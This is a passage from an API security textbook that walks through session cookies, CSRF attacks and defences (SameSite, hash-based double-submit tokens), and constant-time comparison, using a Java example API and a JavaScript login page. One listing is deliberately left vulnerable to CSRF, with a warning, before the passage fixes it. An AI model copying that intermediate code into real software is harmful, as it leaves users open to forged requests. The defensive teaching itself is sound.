- __Secure-: Enforces that the cookie must be set with the Secure attribute and
  set by a secure origin.
- __Host-: Enforces the same protections as __Secure-, but also enforces that
  the cookie is a host-only cookie (has no Domain attribute). This ensures that
  the cookie cannot be overwritten by a cookie from a sub-domain and is a signif-
  icant protection against sub-domain hijacking attacks.
NOTE
These prefixes start with two underscore characters and include a
hyphen at the end. For example, if your cookie was previously named “ses-
sion,” then the new name with the host prefix would be “__Host-session.”
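For example, a prefixed session cookie would be set with a header like the following (the token value is a placeholder for illustration, not real API output):

Set-Cookie: __Host-session=<token>; Path=/; Secure; HttpOnly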
4.3.3 Validating session cookies
You’ve now implemented cookie-based login, but the API will still reject requests that
do not supply a username and password, because you are not checking for the session
cookie anywhere. The existing HTTP Basic authentication filter populates the subject
attribute on the request if valid credentials are found, and later access control filters
check for the presence of this subject attribute. You can allow requests with a session
cookie to proceed by implementing the same contract: if a valid session cookie is pres-
ent, then extract the username from the session and set it as the subject attribute in
the request, as shown in listing 4.9. If a valid token is present on the request and not
expired, then the code sets the subject attribute on the request and populates any
other token attributes. To add token validation, open TokenController.java in your
editor and add the validateToken method from the listing and save the file.
WARNING
This code is vulnerable to Cross-Site Request Forgery attacks. You will
fix these attacks in section 4.4.
Listing 4.9
Validating a session cookie

public void validateToken(Request request, Response response) {
    // WARNING: CSRF attack possible
    // Check if a token is present and not expired.
    tokenStore.read(request, null).ifPresent(token -> {
        if (now().isBefore(token.expiry)) {
            // Populate the request subject attribute and any
            // attributes associated with the token.
            request.attribute("subject", token.username);
            token.attributes.forEach(request::attribute);
        }
    });
}
Because the CookieTokenStore can determine the token associated with a request by
looking at the cookies, you can leave the tokenId argument null for now when look-
ing up the token in the tokenStore. The alternative token store implementations
described in chapter 5 all require a token ID to be passed in, and as you will see in the
next section, this is also a good idea for session cookies, but for now it will work fine
without one.
To wire up the token validation filter, navigate back to the Main.java file in your
editor and locate the line that adds the current UserController authentication filter
(that implements HTTP Basic support). Add the TokenController validateToken()
method as a new before() filter right after the existing filter:
before(userController::authenticate);
before(tokenController::validateToken);
If either filter succeeds, then the subject attribute will be populated in the request and
subsequent access control checks will pass. But if neither filter finds valid authenti-
cation credentials, then the subject attribute will remain null in the request and
access will be denied for any request that requires authentication. This means that the
API can continue to support either method of authentication, providing flexibility
for clients.
Restart the API and you can now try out making requests using a session cookie
instead of using HTTP Basic on every request. First, create a test user as before:
$ curl -H 'Content-Type: application/json' \
-d '{"username":"test","password":"password"}' \
https://localhost:4567/users
{"username":"test"}
Next, call the /sessions endpoint to login, passing the username and password as
HTTP Basic authentication credentials. You can use the -c option to curl to save any
cookies on the response to a file (known as a cookie jar):
$ curl -i -c /tmp/cookies -u test:password \
-H 'Content-Type: application/json' \
-X POST https://localhost:4567/sessions
HTTP/1.1 201 Created
Date: Sun, 19 May 2019 19:15:33 GMT
Set-Cookie: JSESSIONID=node0l2q3fc024gw8wq4wp961y5rk0.node0;Path=/;Secure;HttpOnly
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Cache-Control: no-store
Server:
Transfer-Encoding: chunked
{"token":"node0l2q3fc024gw8wq4wp961y5rk0"}
Finally, you can make a call to an API endpoint. You can either manually create a
Cookie header, or you can use curl’s -b option to send any cookies from the cookie jar
you created in the previous request:
$ curl -b /tmp/cookies \
-H 'Content-Type: application/json' \
-d '{"name":"test space","owner":"test"}' \
https://localhost:4567/spaces
{"name":"test space","uri":"/spaces/1"}
4.4 Preventing Cross-Site Request Forgery attacks
Imagine that you have logged into Natter and then receive a message from Polly in
Marketing with a link inviting you to order some awesome Manning books with a 20%
discount. So eager are you to take up this fantastic offer that you click it without think-
ing. The website loads but tells you that the offer has expired. Disappointed, you
return to Natter to ask your friend about it, only to discover that someone has some-
how managed to post abusive messages to some of your friends, apparently sent by
you! You also seem to have posted the same offer link to your other friends.
Pop quiz

2  What is the best way to avoid session fixation attacks?

   a  Ensure cookies have the Secure attribute.
   b  Only allow your API to be accessed over HTTPS.
   c  Ensure cookies are set with the HttpOnly attribute.
   d  Add a Content-Security-Policy header to the login response.
   e  Invalidate any existing session cookie after a user authenticates.

3  Which cookie attribute should be used to prevent session cookies being read from
   JavaScript?

   a  Secure
   b  HttpOnly
   c  Max-Age=-1
   d  SameSite=lax
   e  SameSite=strict

The answers are at the end of the chapter.
For an API designer, the appeal of cookies is that, once set, the browser will trans-
parently add them to every request. As a client developer, this makes life simple. After
the user has redirected back from the login endpoint, you can just make API requests
without worrying about authentication credentials. Alas, this strength is also one of
the greatest weaknesses of session cookies. The browser will also attach the same cook-
ies when requests are made from other sites that are not your UI. The site you visited
when you clicked the link from Polly loaded some JavaScript that made requests to the
Natter API from your browser window. Because you’re still logged in, the browser hap-
pily sends your session cookie along with those requests. To the Natter API, those
requests look as if you had made them yourself.
As shown in figure 4.9, in many cases browsers will happily let a script from
another website make cross-origin requests to your API; it just prevents them from
reading any response. Such an attack is known as Cross-Site Request Forgery because
the malicious site can create fake requests to your API that appear to come from a
genuine client.
Figure 4.9
In a CSRF attack, the user first visits the legitimate site and logs in to get a session
cookie. Later, they visit a malicious site that makes cross-origin calls to the Natter API. The browser
will send the requests and attach the cookies, just like in a genuine request. The malicious script is
only blocked from reading the response to cross-origin requests, not stopped from making them.
DEFINITION
Cross-site request forgery (CSRF, pronounced “sea-surf”) occurs
when an attacker makes a cross-origin request to your API and the browser
sends cookies along with the request. The request is processed as if it was gen-
uine unless extra checks are made to prevent these requests.
For JSON APIs, requiring an application/json Content-Type header on all requests
makes CSRF attacks harder to pull off, as does requiring another nonstandard header
such as the X-Requested-With header sent by many JavaScript frameworks. This is
because such nonstandard headers trigger the same-origin policy protections described
in section 4.2.2. But attackers have found ways to bypass such simple protections, for
example, by using flaws in the Adobe Flash browser plugin. It is therefore better to
design explicit CSRF defenses into your APIs when you accept cookies for authentica-
tion, such as the protections described in the next sections.
TIP
An important part of protecting your API from CSRF attacks is to ensure
that you never perform actions that alter state on the server or have other
real-world effects in response to GET requests. GET requests are almost
always allowed by browsers and most CSRF defenses assume that they are safe.
4.4.1 SameSite cookies
There are several ways that you can prevent CSRF attacks. When the API is hosted on
the same domain as the UI, you can use a new technology known as SameSite cookies to
significantly reduce the possibility of CSRF attacks. While still a draft standard (https://
tools.ietf.org/html/draft-ietf-httpbis-rfc6265bis-03#section-5.3.7), SameSite cookies
are already supported by the current versions of all major browsers. When a cookie is
marked as SameSite, it will only be sent on requests that originate from the same
registerable domain that originally set the cookie. This means that when the malicious
site from Polly’s link tries to send a request to the Natter API, the browser will send
it without the session cookie and the request will be rejected by the server, as shown in
figure 4.10.
DEFINITION
A SameSite cookie will only be sent on requests that originate
from the same domain that originally set the cookie. Only the registerable
domain is examined, so api.payments.example.com and www.example.com
are considered the same site, as they both have the registerable domain of
example.com. On the other hand, www.example.org (different suffix) and
www.different.com are considered different sites. Unlike an origin, the proto-
col and port are not considered when making same-site decisions.
The public suffix list
SameSite cookies rely on the notion of a registerable domain, which consists of a
top-level domain plus one more level. For example, .com is a top-level domain, so
example.com is a registerable domain, but foo.example.com typically isn't. The situ-
ation is made more complicated because there are some domain suffixes such as
.co.uk, which aren’t strictly speaking a top-level domain (which would be .uk) but
should be treated as if they are. There are also websites like github.io that allow any-
body to sign up and register a sub-domain, such as neilmadden.github.io, making
github.io also effectively a top-level domain.
Because there are no simple rules for deciding what is or isn’t a top-level domain,
Mozilla maintains an up-to-date list of effective top-level domains (eTLDs), known as
the public suffix list (https://publicsuffix.org). A registerable domain in SameSite is
an eTLD plus one extra level, or eTLD + 1 for short. You can submit your own website
to the public suffix list if you want your sub-domains to be treated as effectively inde-
pendent websites with no cookie sharing between them, but this is quite a drastic
measure to take.
Figure 4.10
When a cookie is marked as SameSite=strict or SameSite=lax, then the browser
will only send it on requests that originate from the same domain that set the cookie. This
prevents CSRF attacks, because cross-domain requests will not have a session cookie and so
will be rejected by the API.
To mark a cookie as SameSite, you can add either SameSite=lax or SameSite=strict on
the Set-Cookie header, just like marking a cookie as Secure or HttpOnly (section 4.3.2).
The difference between the two modes is subtle. In strict mode, cookies will not be
sent on any cross-site request, including when a user just clicks on a link from one site
to another. This can be a surprising behavior that might break traditional websites. To
get around this, lax mode allows cookies to be sent when a user directly clicks on a
link but will still block cookies on most other cross-site requests. Strict mode should be
preferred if you can design your UI to cope with missing cookies when following links.
For example, many single-page apps work fine in strict mode because the first request
when following a link just loads a small HTML template and the JavaScript imple-
menting the SPA. Subsequent calls from the SPA to the API will be allowed to include
cookies as they originate from the same site.
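For example, a strictly same-site session cookie would be set with a header like the following (an illustration with a placeholder value, not output from the API as configured so far):

Set-Cookie: JSESSIONID=<token>; Path=/; Secure; HttpOnly; SameSite=strict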
TIP
Recent versions of Chrome have started marking cookies as SameSite=lax
by default (at the time of writing, this initiative has been paused due to the
global COVID-19 pandemic). Other major browsers have announced intentions to
follow suit. You can opt out of this behavior by explicitly adding a new SameSite=none
attribute to your cookies, but only if they are also Secure. Unfortunately,
this new attribute is not compatible with all browsers.
SameSite cookies are a good additional protection measure against CSRF attacks,
but they are not yet implemented by all browsers and frameworks. Because the
notion of same site includes sub-domains, they also provide little protection against
sub-domain hijacking attacks. The protection against CSRF is as strong as the weak-
est sub-domain of your site: if even a single sub-domain is compromised, then all
protection is lost. For this reason, SameSite cookies should be implemented as a
defense-in-depth measure. In the next section you will implement a more robust
defense against CSRF.
4.4.2 Hash-based double-submit cookies
The most effective defense against CSRF attacks is to require that the caller prove that
they know the session cookie, or some other unguessable value associated with the ses-
sion. A common pattern for preventing CSRF in traditional web applications is to gen-
erate a random string and store it as an attribute on the session. Whenever the
application generates an HTML form, it includes the random token as a hidden field.
When the form is submitted, the server checks that the form data contains this hidden
field and that the value matches the value stored in the session associated with the
cookie. Any form data that is received without the hidden field is rejected. This effec-
tively prevents CSRF attacks because an attacker cannot guess the random fields and
so cannot forge a correct request.
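In a server-rendered web application, the hidden-field pattern looks something like the following sketch (the form action, field names, and token value are all illustrative, not part of the Natter API):

<form method="POST" action="/transfer">
  <!-- The anti-CSRF token is embedded as a hidden field. The server
       rejects the form unless it matches the value in the session. -->
  <input type="hidden" name="csrfToken" value="j8UhGq...">
  <input type="text" name="amount">
  <input type="submit" value="Transfer">
</form>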
An API does not have the luxury of adding hidden form fields to requests because
most API clients want JSON or another data format rather than HTML. Your API must
therefore use some other mechanism to ensure that only valid requests are processed.
One alternative is to require that calls to your API include a random token in a custom
header, such as X-CSRF-Token, along with the session cookie. A common approach is to
store this extra random token as a second cookie in the browser and require that it be
sent as both a cookie and as an X-CSRF-Token header on each request. This second
cookie is not marked HttpOnly, so that it can be read from JavaScript (but only from
the same origin). This approach is known as a double-submit cookie, as the cookie is sub-
mitted to the server twice. The server then checks that the two values are equal as
shown in figure 4.11.
DEFINITION
A double-submit cookie is a cookie that must also be sent as a custom
header on every request. As cross-origin scripts are not able to read the value
of the cookie, they cannot create the custom header value, so this is an effec-
tive defense against CSRF attacks.
This traditional solution has some problems, because although it is not possible to
read the value of the second cookie from another origin, there are several ways that
the cookie could be overwritten by the attacker with a known value, which would then
let them forge requests. For example, if the attacker compromises a sub-domain of
your site, they may be able to overwrite the cookie. The __Host- cookie name prefix
discussed in section 4.3.2 can help protect against these attacks in modern browsers by
preventing a sub-domain from overwriting the cookie.
A more robust solution to these problems is to make the second token be cryp-
tographically bound to the real session cookie.
DEFINITION
An object is cryptographically bound to another object if there is an
association between them that is infeasible to spoof.
Rather than generating a second random cookie, you will run the original session
cookie through a cryptographically secure hash function to generate the second token. This
ensures that any attempt to change either the anti-CSRF token or the session cookie will
be detected because the hash of the session cookie will no longer match the token.
Because the attacker cannot read the session cookie, they are unable to compute the
correct hash value. Figure 4.12 shows the updated double-submit cookie pattern. Unlike
the password hashes used in chapter 3, the input to the hash function is an unguessable
string with high entropy. You therefore don’t need to worry about slowing the hash
function down because an attacker has no chance of trying all possible session tokens.
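In outline, the check the server performs looks like the following. This is only a sketch of what listing 4.11 will implement; the variable and helper names (base64urlDecode, constantTimeEquals) are hypothetical placeholders:

// Sketch only; see listing 4.11 for the real implementation.
var expectedToken = sha256(sessionCookieValue);           // recomputed from the real session cookie
var providedToken = base64urlDecode(csrfTokenHeader);     // value supplied by the client
if (!constantTimeEquals(expectedToken, providedToken)) {
    // Reject: the token or the session cookie was tampered with.
}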
DEFINITION
A hash function takes an arbitrarily sized input and produces a
fixed-size output. A hash function is cryptographically secure if it is infeasible to
work out what input produced a given output without trying all possible
inputs (known as preimage resistance), or to find two distinct inputs that pro-
duce the same output (collision resistance).
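To make the fixed-size property concrete, here is a throwaway check (not part of the Natter code):

import java.security.MessageDigest;

public class HashSizeDemo {
    public static void main(String[] args) throws Exception {
        var md = MessageDigest.getInstance("SHA-256");
        // A 1-byte input and a 1 MB input both hash to exactly 32 bytes.
        System.out.println(md.digest("a".getBytes()).length);       // 32
        System.out.println(md.digest(new byte[1_000_000]).length);  // 32
    }
}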
Figure 4.11 In the double-submit cookie pattern, the server avoids storing a second token by setting it as a second cookie on the client. When the legitimate client makes a request, it reads the CSRF cookie value (which cannot be marked HttpOnly) and sends it as an additional header. The server checks that the CSRF cookie matches the header. A malicious client on another origin is not able to read the CSRF cookie and so cannot make requests. But if the attacker compromises a sub-domain, they can overwrite the CSRF cookie with a known value.
The security of this scheme depends on the security of the hash function. If the
attacker can easily guess the output of the hash function without knowing the input,
then they can guess the value of the CSRF cookie. For example, if the hash function
only produced a 1-byte output, then the attacker could just try each of the 256 possi-
ble values. Because the CSRF cookie will be accessible to JavaScript and might be acci-
dentally sent over insecure channels, while the session cookie isn’t, the hash function
should also make sure that an attacker isn’t able to reverse the hash function to dis-
cover the session cookie value if the CSRF token value accidentally leaks.

Figure 4.12 In the hash-based double-submit cookie pattern, the anti-CSRF token is computed as a secure hash of the session cookie. As before, a malicious client is unable to guess the correct value. However, they are now also prevented from overwriting the CSRF cookie because they cannot compute the hash of the session cookie.

In this section, you will use the SHA-256 hash function. SHA-256 is considered by most cryptographers to be a secure hash function.
DEFINITION
SHA-256 is a cryptographically secure hash function designed by
the US National Security Agency that produces a 256-bit (32-byte) output
value. SHA-256 is one variant of the SHA-2 family of secure hash algorithms
specified in the Secure Hash Standard (https://doi.org/10.6028/NIST.FIPS.180-4), which replaced the older SHA-1 standard (which is no longer considered secure). SHA-2 specifies several other variants that produce different
output sizes, such as SHA-384 and SHA-512. There is also now a newer SHA-3
standard (selected through an open international competition), with variants
named SHA3-256, SHA3-384, and so on, but SHA-2 is still considered secure
and is widely implemented.
4.4.3 Double-submit cookies for the Natter API
To protect the Natter API, you will implement hash-based double-submit cookies as
described in the last section. First, you should update the CookieTokenStore create
method to return the SHA-256 hash of the session cookie as the token ID, rather than
the real value. Java’s MessageDigest class (in the java.security package) imple-
ments a number of cryptographic hash functions, and SHA-256 is implemented by all
current Java environments. Because SHA-256 returns a byte array and the token ID
should be a String, you can Base64-encode the result to generate a string that is safe
to store in a cookie or header. It is common to use the URL-safe variant of Base64 in web APIs, because it can be used almost anywhere in an HTTP request without additional encoding, so that is what you will use here. Listing 4.10 shows a simplified interface to the standard Java Base64 encoding and decoding libraries implementing the
URL-safe variant. Create a new file named Base64url.java inside the src/main/java/
com/manning/apisecurityinaction/token folder with the contents of the listing.
Listing 4.10 URL-safe Base64 encoding

package com.manning.apisecurityinaction.token;

import java.util.Base64;

public class Base64url {
    // Define static instances of the encoder and decoder objects.
    private static final Base64.Encoder encoder =
            Base64.getUrlEncoder().withoutPadding();
    private static final Base64.Decoder decoder =
            Base64.getUrlDecoder();

    // Define simple encode and decode methods.
    public static String encode(byte[] data) {
        return encoder.encodeToString(data);
    }

    public static byte[] decode(String encoded) {
        return decoder.decode(encoded);
    }
}
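As a quick sanity check, encoding and decoding round-trip as you'd expect. This throwaway demo is not part of the Natter code:

package com.manning.apisecurityinaction.token;

import java.util.Arrays;

public class Base64urlDemo {
    public static void main(String[] args) {
        byte[] data = { (byte) 0xFB, (byte) 0xEF, 0x01 };
        String encoded = Base64url.encode(data);
        System.out.println(encoded);  // prints --8B (URL-safe alphabet, no padding)
        System.out.println(Arrays.equals(data, Base64url.decode(encoded)));  // true
    }
}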
The most important part of the changes is to enforce that the CSRF token supplied by
the client in a header matches the SHA-256 hash of the session cookie. You can per-
form this check in the CookieTokenStore read method by comparing the tokenId
argument provided to the computed hash value. One subtle detail is that you should
compare the computed value against the provided value using a constant-time equal-
ity function to avoid timing attacks that would allow an attacker to recover the CSRF
token value just by observing how long it takes your API to compare the provided
value to the computed value. Java provides the MessageDigest.isEqual method to
compare two byte-arrays for equality in constant time,2 which you can use as follows to
compare the provided token ID with the computed hash:
var provided = Base64.getUrlDecoder().decode(tokenId);
var computed = sha256(session.id());
if (!MessageDigest.isEqual(computed, provided)) {
return Optional.empty();
}
2 In older versions of Java, MessageDigest.isEqual wasn’t constant-time and you may find old articles about
this such as https://codahale.com/a-lesson-in-timing-attacks/. This has been fixed in Java for a decade now
so you should just use MessageDigest.isEqual rather than writing your own equality method.
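You can see MessageDigest.isEqual in action with a quick throwaway test (again, not part of the Natter code):

import java.security.MessageDigest;

public class IsEqualDemo {
    public static void main(String[] args) throws Exception {
        var md = MessageDigest.getInstance("SHA-256");
        byte[] computed = md.digest("session-id".getBytes());
        byte[] provided = md.digest("session-id".getBytes());
        System.out.println(MessageDigest.isEqual(computed, provided));  // true

        provided[0] ^= 1;  // flip a single bit
        System.out.println(MessageDigest.isEqual(computed, provided));  // false
    }
}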
Timing attacks

A timing attack works by measuring tiny differences in the time it takes a computer to process different inputs to work out some information about a secret value that the attacker does not know. Timing attacks can measure even very small differences in the time it takes to perform a computation, even when carried out over the internet. The classic paper Remote Timing Attacks are Practical by David Brumley and Dan Boneh of Stanford (2005; https://crypto.stanford.edu/~dabo/papers/ssl-timing.pdf) demonstrated that timing attacks are practical for attacking computers on the same local network, and the techniques have been developed since then. Recent research shows you can remotely measure timing differences as low as 100 nanoseconds over the internet (https://papers.mathyvanhoef.com/usenix2020.pdf).

Consider what would happen if you used the normal String equals method to compare the hash of the session ID with the anti-CSRF token received in a header. In most programming languages, including Java, string equality is implemented with a loop that terminates as soon as the first non-matching character is found. This means that the code takes very slightly longer to match if the first two characters match than if only a single character matches. A sophisticated attacker can measure even this tiny difference in timing. They can then simply keep sending guesses for the anti-CSRF token. First, they try every possible value for the first character (64 possibilities because we are using Base64 encoding) and pick the value that took slightly longer to respond. Then they do the same for the second character, and then the third, and so on. By finding the character that takes slightly longer to respond at each step, they can slowly recover the entire anti-CSRF token using time only proportional to its length, rather than needing to try every possible value. For a 10-character Base64-encoded string, this changes the number of guesses needed from around 64^10 (over 1 quintillion possibilities) to just 640. Of course, this attack needs many more requests to be able to accurately measure such small timing differences (typically many thousands of requests per character), but the attacks are improving all the time.

The solution to such timing attacks is to ensure that all code that performs comparisons or lookups using secret values takes a constant amount of time regardless of the value of the user input that is supplied. To compare two values for equality, you can use a loop that does not terminate early when it finds a wrong value. The following code uses the bitwise XOR (^) and OR (|) operators to check if two byte arrays are equal. The value of c will only be zero at the end if every single byte was identical.

if (a.length != b.length) return false;
int c = 0;
for (int i = 0; i < a.length; i++)
    c |= (a[i] ^ b[i]);
return c == 0;

This code is very similar to how MessageDigest.isEqual is implemented in Java. Check the documentation for your programming language to see if it offers a similar facility.

To update the implementation, open CookieTokenStore.java in your editor and update the code to match listing 4.11. Save the file when you are happy with the changes.

Listing 4.11 Preventing CSRF in CookieTokenStore

package com.manning.apisecurityinaction.token;

import java.nio.charset.StandardCharsets;
import java.security.*;
import java.util.*;

import spark.Request;

public class CookieTokenStore implements TokenStore {

    @Override
    public String create(Request request, Token token) {
        var session = request.session(false);
        if (session != null) {
            session.invalidate();
        }
        session = request.session(true);
        session.attribute("username", token.username);
        session.attribute("expiry", token.expiry);
        session.attribute("attrs", token.attributes);

        // Return the SHA-256 hash of the session cookie, Base64url-encoded.
        return Base64url.encode(sha256(session.id()));
    }

    @Override
    public Optional<Token> read(Request request, String tokenId) {
        var session = request.session(false);
        if (session == null) {
            return Optional.empty();
        }

        // Decode the supplied token ID and compare it to the
        // SHA-256 of the session.
        var provided = Base64url.decode(tokenId);
        var computed = sha256(session.id());

        // If the CSRF token doesn't match the session hash,
        // then reject the request.
        if (!MessageDigest.isEqual(computed, provided)) {
            return Optional.empty();
        }

        var token = new Token(session.attribute("expiry"),
                session.attribute("username"));
        token.attributes.putAll(session.attribute("attrs"));
        return Optional.of(token);
    }

    static byte[] sha256(String tokenId) {
        try {
            // Use the Java MessageDigest class to hash the session ID.
            var sha256 = MessageDigest.getInstance("SHA-256");
            return sha256.digest(
                    tokenId.getBytes(StandardCharsets.UTF_8));
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException(e);
        }
    }
}

The TokenController already returns the token ID to the client in the JSON body of the response to the login endpoint. This will now return the SHA-256 hashed version, because that is what the CookieTokenStore returns. This has an added security benefit: the real session ID is now never exposed to JavaScript, even in that response. While you could alter the TokenController to set the CSRF token as a cookie directly, it is better to leave this up to the client. A JavaScript client can set the cookie after login just as easily as the API can, and as you will see in chapter 5, there are alternatives to cookies for storing these tokens. The server doesn't care where the client stores the CSRF token, so long as the client can find it again after page reloads and redirects and so on.

The final step is to update the TokenController token validation method to look for the CSRF token in the X-CSRF-Token header on every request. If the header is not present, then the request should be treated as unauthenticated. Otherwise, you can pass the CSRF token down to the CookieTokenStore as the tokenId parameter as
shown in listing 4.12. If the header isn’t present, then return without validating the
cookie. Together with the hash check inside the CookieTokenStore, this ensures that
requests without a valid CSRF token, or with an invalid one, will be treated as if they
didn’t have a session cookie at all and will be rejected if authentication is required. To
make the changes, open TokenController.java in your editor and update the validateToken method to match listing 4.12.

Listing 4.12 The updated token validation method

public void validateToken(Request request, Response response) {
    // Read the CSRF token from the X-CSRF-Token header.
    var tokenId = request.headers("X-CSRF-Token");
    if (tokenId == null) return;

    // Pass the CSRF token to the TokenStore as the tokenId parameter.
    tokenStore.read(request, tokenId).ifPresent(token -> {
        if (now().isBefore(token.expiry)) {
            request.attribute("subject", token.username);
            token.attributes.forEach(request::attribute);
        }
    });
}
TRYING IT OUT
If you restart the API, you can try out some requests to see the CSRF protections in
action. First, create a test user as before:
$ curl -H 'Content-Type: application/json' \
-d '{"username":"test","password":"password"}' \
https://localhost:4567/users
{"username":"test"}
You can then log in to create a new session. Notice how the token returned in the
JSON is now different to the session ID in the cookie.
$ curl -i -c /tmp/cookies -u test:password \
-H 'Content-Type: application/json' \
-X POST https://localhost:4567/sessions
HTTP/1.1 201 Created
Date: Mon, 20 May 2019 16:07:42 GMT
Set-Cookie:
JSESSIONID=node01n8sqv9to4rpk11gp105zdmrhd0.node0;Path=/;Secure;HttpOnly
…
{"token":"gB7CiKkxx0FFsR4lhV9hsvA1nyT7Nw5YkJw_ysMm6ic"}
If you send the correct X-CSRF-Token header, then requests succeed as expected:
$ curl -i -b /tmp/cookies -H 'Content-Type: application/json' \
-H 'X-CSRF-Token: gB7CiKkxx0FFsR4lhV9hsvA1nyT7Nw5YkJw_ysMm6ic' \
-d '{"name":"test space","owner":"test"}' \
https://localhost:4567/spaces
HTTP/1.1 201 Created
…
{"name":"test space","uri":"/spaces/1"}
If you leave out the X-CSRF-Token header, then requests are rejected as if they were
unauthenticated:
$ curl -i -b /tmp/cookies -H 'Content-Type: application/json' \
-d '{"name":"test space","owner":"test"}' \
https://localhost:4567/spaces
HTTP/1.1 401 Unauthorized
…
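Likewise, supplying a tampered or made-up token value is rejected in the same way; for example (the token below is deliberately bogus):

$ curl -i -b /tmp/cookies -H 'Content-Type: application/json' \
  -H 'X-CSRF-Token: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' \
  -d '{"name":"test space","owner":"test"}' \
  https://localhost:4567/spaces
HTTP/1.1 401 Unauthorized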
Pop quiz

4. Given a cookie set by https://api.example.com:8443 with the attribute SameSite=strict, which of the following web pages will be able to make API calls to api.example.com with the cookie included? (There may be more than one correct answer.)
   a. http://www.example.com/test
   b. https://other.com:8443/test
   c. https://www.example.com:8443/test
   d. https://www.example.org:8443/test
   e. https://api.example.com:8443/test

5. What problem with traditional double-submit cookies is solved by the hash-based approach described in section 4.4.2?
   a. Insufficient crypto magic.
   b. Browsers may reject the second cookie.
   c. An attacker may be able to overwrite the second cookie.
   d. An attacker may be able to guess the second cookie value.
   e. An attacker can exploit a timing attack to discover the second cookie value.

The answers are at the end of the chapter.

4.5 Building the Natter login UI

Now that you've got session-based login working from the command line, it's time to build a web UI to handle login. In this section, you'll put together a simple login UI, much like the existing Create Space UI that you created earlier, as shown in figure 4.13. When the API returns a 401 response, indicating that the user requires authentication, the Natter UI will redirect to the login UI. The login UI will then submit the username and password to the API login endpoint to get a session cookie, set the anti-CSRF token as a second cookie, and then redirect back to the main Natter UI.

Figure 4.13 The login UI features a simple username and password form. Once successfully submitted, the form will redirect to the main natter.html UI page that you built earlier.

While it is possible to intercept the 401 response from the API in JavaScript, it is not possible to stop the browser popping up the ugly default login box when it receives a WWW-Authenticate header prompting it for Basic authentication credentials. To get around this, you can simply remove that header from the response when the user is not authenticated. Open the UserController.java file in your editor and update the requireAuthentication method to omit this header on the response. The new implementation is shown in listing 4.13. Save the file when you are happy with the change.

Listing 4.13 The updated authentication check

public void requireAuthentication(Request request, Response response) {
    if (request.attribute("subject") == null) {
        // Halt with a 401 error if the user is not authenticated,
        // but leave out the WWW-Authenticate header.
        halt(401);
    }
}
Technically, sending a 401 response and not including a WWW-Authenticate header is
in violation of the HTTP standard (see https://tools.ietf.org/html/rfc7235#section-3.1
for the details), but the pattern is now widespread. There is no standard HTTP auth
scheme for session cookies that could be used. In the next chapter, you will learn
about the Bearer auth scheme used by OAuth 2.0, which is becoming widely adopted for this purpose.
The HTML for the login page is very similar to the existing HTML for the Create
Space page that you created earlier. As before, it has a simple form with two input
fields for the username and password, with some simple CSS to style it. Use an input
with type="password" to ensure that the browser hides the password from anybody
watching over the user’s shoulder. To create the new page, navigate to src/main/
resources/public and create a new file named login.html. Type the contents of list-
ing 4.14 into the new file and click save. You’ll need to rebuild and restart the API
for the new page to become available, but first you need to implement the JavaScript
login logic.
Listing 4.14 The login form HTML

<!DOCTYPE html>
<html>
<head>
  <title>Natter!</title>
  <script type="text/javascript" src="login.js"></script>
  <style type="text/css">
    /* As before, customize the CSS to style the form as you wish. */
    input { margin-right: 100% }
  </style>
</head>
<body>
  <h2>Login</h2>
  <form id="login">
    <!-- The username field is a simple text field. -->
    <label>Username: <input name="username" type="text" id="username">
    </label>
    <!-- Use an HTML password input field so the browser hides the password. -->
    <label>Password: <input name="password" type="password" id="password">
    </label>
    <button type="submit">Login</button>
  </form>
</body>
</html>
4.5.1 Calling the login API from JavaScript
You can use the fetch API in the browser to make a call to the login endpoint, just as
you did previously. Create a new file named login.js next to the login.html you just
added and save the contents of listing 4.15 to the file. The listing adds a login(username, password) function that manually Base64-encodes the username and password
and adds them as an Authorization header on a fetch request to the /sessions end-
point. If the request is successful, then you can extract the anti-CSRF token from the
JSON response and set it as a cookie by assigning to the document.cookie field.
Because the cookie needs to be accessed from JavaScript, you cannot mark it as Http-
Only, but you can apply other security attributes to prevent it accidentally leaking.
Finally, redirect the user back to the Create Space UI that you created earlier. The rest
of the listing intercepts the form submission, just as you did for the Create Space form
at the start of this chapter.
Listing 4.15 Calling the login endpoint from JavaScript

const apiUrl = 'https://localhost:4567';

function login(username, password) {
    // Encode the credentials for HTTP Basic authentication.
    let credentials = 'Basic ' + btoa(username + ':' + password);

    fetch(apiUrl + '/sessions', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
            'Authorization': credentials
        }
    })
    .then(res => {
        if (res.ok) {
            res.json().then(json => {
                // If successful, then set the csrfToken cookie
                // and redirect to the Natter UI.
                document.cookie = 'csrfToken=' + json.token +
                    ';Secure;SameSite=strict';
                window.location.replace('/natter.html');
            });
        }
    })
    // Otherwise, log the error to the console.
    .catch(error => console.error('Error logging in: ', error));
}

// Set up an event listener to intercept the form submit,
// just as you did for the Create Space UI.
window.addEventListener('load', function(e) {
    document.getElementById('login')
        .addEventListener('submit', processLoginSubmit);
});

function processLoginSubmit(e) {
    e.preventDefault();
    let username = document.getElementById('username').value;
    let password = document.getElementById('password').value;
    login(username, password);
    return false;
}

Rebuild and restart the API using

mvn clean compile exec:java

and then open a browser and navigate to https://localhost:4567/login.html. If you open your browser's developer tools, you can examine the HTTP requests that get made as you interact with the UI. Create a test user on the command line as before:

curl -H 'Content-Type: application/json' \
  -d '{"username":"test","password":"password"}' \
  https://localhost:4567/users

Then type the same username and password into the login UI and click Login. You will see a request to /sessions with an Authorization header with the value Basic dGVzdDpwYXNzd29yZA==. In response, the API returns a Set-Cookie header for the session cookie and the anti-CSRF token in the JSON body. You will then be redirected to the Create Space page. If you examine the cookies in your browser, you will see both the JSESSIONID cookie set by the API response and the csrfToken cookie set by JavaScript, as in figure 4.14.

Figure 4.14 The two cookies viewed in Chrome's developer tools. The JSESSIONID cookie is set by the API and marked as HttpOnly. The csrfToken cookie is set by JavaScript and left accessible so that the Natter UI can send it as a custom header.
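Incidentally, that Authorization value is just the Base64 encoding of the string test:password, which you can verify with a throwaway snippet (not part of the Natter code):

import java.util.Base64;

public class BasicAuthDemo {
    public static void main(String[] args) {
        var encoded = Base64.getEncoder()
                .encodeToString("test:password".getBytes());
        System.out.println(encoded);  // prints dGVzdDpwYXNzd29yZA==
    }
}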
If you try to actually create a new social space, the request is blocked by the API
because you are not yet including the anti-CSRF token in the requests. To do that, you
need to update the Create Space UI to extract the csrfToken cookie value and
include it as the X-CSRF-Token header on each request. Getting the value of a cookie
in JavaScript is slightly more complex than it should be, as the only access is via the
